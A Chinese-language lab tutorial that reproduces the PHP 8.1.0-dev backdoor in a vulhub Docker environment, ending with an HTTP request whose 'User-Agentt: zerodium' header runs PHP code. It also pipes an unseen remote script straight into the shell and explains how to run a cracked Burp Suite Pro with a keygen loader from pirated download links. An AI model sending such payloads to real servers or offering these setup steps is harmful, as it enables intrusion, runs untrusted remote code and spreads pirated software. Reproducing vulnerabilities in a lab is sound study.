vulhub复现环境搭建
1 2
| 漏洞环境: https://vulhub.org/#/environments/
|
以复现 <<PHP 8.1.0-dev 开发版本后门事件>>为例
PHP 8.1.0-dev 版本在2021年3月28日被植入后门,但是后门很快被发现并清除。当服务器存在该后门时,攻击者可以通过发送User-Agentt头来执行任意代码。
参考:https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md
QQ群:397745473
主机环境
购买VPS主机:https://www.vultr.com/?ref=8391117-6G
执行命令一键搭建桌面环境:
1
| source <(curl -sL https://git.io/Jqfs7)
|
安装docker环境
直接执行以下命令即可
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
| apt-get update 【安装docker】 apt install -y docker.io apt-get install python3-pip pip3 install docker-compose service docker start
【接取docker】 git clone https://github.com/vulhub/vulhub.git cd vulhub/php/8.1-backdoor
docker-compose up -d
访问测试页面: http://127.0.0.1:8080/
【进入docker】 docker exec -i -t 0c5d95fcb39e /bin/bash
|
Burp Suite Pro安装
上传burp.zip到vps中
1 2 3 4 5 6 7 8
| 安装java环境: apt install default-jre java -Xmx2g -jar burpsuite_pro_v2020.2.1.jar
java -jar burp-loader-keygen-2020_2_1.jar java -jar burpsuite_pro_v2020.2.1.jar
|
我使用的方法
1 2 3 4 5 6 7 8 9 10
| 1. 先到官网下载最新版程序并安装 https://portswigger.net/burp/releases 从这里安装的软件自带有一个配套的jre
2. 到52下载破解版程序 https://down.52pojie.cn/Tools/Network_Analyzer/
3. 启动命令(旧) ~/BurpSuitePro/jre/bin/java -Xmx1G -XX:-UseParallelGC -noverify -javaagent:BurpSuiteLoader.jar -Dfile.encoding=utf-8 -jar ~/BurpSuitePro/burpsuite_pro.jar
|
新启动命令
1 2 3
| #!/bin/bash
cd ~/BurpSuitePro;~/BurpSuitePro/jre/bin/java --illegal-access=permit -Xmx1G -XX:-UseParallelGC -noverify -javaagent:BurpSuiteLoader.jar -Dfile.encoding=utf-8 -jar ~/BurpSuitePro/burpsuite_pro.jar
|
其他方法参考
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48
| burp破解版打开方法参考:https://www.ddosi.com/b429/
Burp Suite Pro 2020.9.2破解方法[正确打开方式]:
和上一篇gif演示相同:自行查看该连接中的gif https://www.ddosi.com/wp-content/uploads/2020/09/burpsuite_2020.9.gif
如果运行以后无法正常运行burp,可以试试运行 **java -jar burploader-old.jar**
### 对于windows用户
直接运行0.bat即可 [①确保java版本为9-14之间] [②确保环境变量已设置] [③确保无多余java版本存在]
#### 0.bat中的内容:
``` java --illegal-access=permit -Dfile.encoding=utf-8 -javaagent:BurpSuiteLoader_v2020.9.2.jar -noverify -jar burpsuite_pro_v2020.9.2.jar ```
#### 环境变量未设置的windows用户:
可在cmd中运行如下命令: [①把 **C:\Program Files\Java\jdk-13.0.2\bin\java.exe** 改为你的java版本以及所在目录] [②cd到java所在目录]
``` "C:\Program Files\Java\jdk-13.0.2\bin\java.exe" --illegal-access=permit -Dfile.encoding=utf-8 -javaagent:BurpSuiteLoader_v2020.9.2.jar -noverify -jar burpsuite_pro_v2020.9.2.jar ```
### 对于Linux用户
``` java -Xmx8G -XX:-UseParallelGC -noverify -javaagent:BurpSuiteLoader.jar -Dfile.encoding=utf-8 -jar burpsuite_pro_v2020.2.1.jar ```
## **burpsuite_pro_v2020.9.**2下载地址
①雨苁网盘: [w.ddosi.workers.dev/](https://w.ddosi.workers.dev/雨苁网站分享/burp/burpsuite_pro_v2020.9.2/) ②迅雷网盘: [pan.xunlei.com/s/VMIyZn5Zp30iTdhdxtz8-wr8A1](https://pan.xunlei.com/s/VMIyZn5Zp30iTdhdxtz8-wr8A1) 提取码:ozK0 解压密码 www.ddosi.com
## 官网Burp Suite Pro 2020.9.2.jar SHA256和MD5校验值:
不放心的(谨慎者)可以自行到官网进行校验
|
漏洞复现
发送如下数据包,可见代码var_dump(233*233);
成功执行:
1 2 3 4 5 6 7 8
| GET / HTTP/1.1 Host: localhost:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 User-Agentt: zerodiumvar_dump(233*233); Connection: close
|
删除环境
1 2
| # 删除整个环境 docker-compose down
|
QQ群:397745473